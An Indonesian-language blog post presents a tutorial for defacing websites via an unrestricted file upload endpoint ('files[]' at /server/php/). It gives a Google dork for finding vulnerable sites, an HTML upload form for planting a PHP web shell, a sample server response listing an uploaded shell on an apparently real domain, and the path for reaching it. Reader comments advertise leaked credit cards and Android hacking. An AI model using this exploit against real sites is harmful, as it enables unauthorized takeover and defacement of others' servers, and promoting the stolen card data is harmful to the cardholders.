Deface dengan array files[]
Malem agan agan semua kembali lagi dengan gue :v
di postingan kali ini gue mau bagi bagi tutorial deface dengan Array files[]
langsung aja
Dork : inurl:/server/php/files ext:jpg
*dork bisa di kembangkan
exploit: /server/php/
1.Lu dorking di gugel
2.kalo vuln kek di gambar
3.masukin target lu ke CSRF
<form method="POST" action="http://localhost/dir/server/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
save extensi html
4.buka csrf nya dan upload shell kalo sukses akan muncul
{"files":[{"name":"novi.php","size":80665,"type":"application\/octet-stream","url":"https:\/\/localhost\/admin\/server\/php\/files\/novi.php","deleteUrl":"https:\/\/tripplegee.ng\/admin\/server\/php\/index.php?file=novi.php","deleteType":"DELETE"}]}
akses nya : www.site.com/[path]/dir/server/php/files/namashel.php
happy deface
Subscribe to:
Post Comments
(
Atom
)
Keren gan, sekedar berbagi..
ReplyDeletehttp://www.masukangin.net/2017/11/leaked-credit-card-2017-fresh-and-full.html
Hack your android
http://www.masukangin.net/2017/11/tutorial-terbaru-ampuh-cara-hack-android-menggunakan-kali-linux.html
Follow blog ya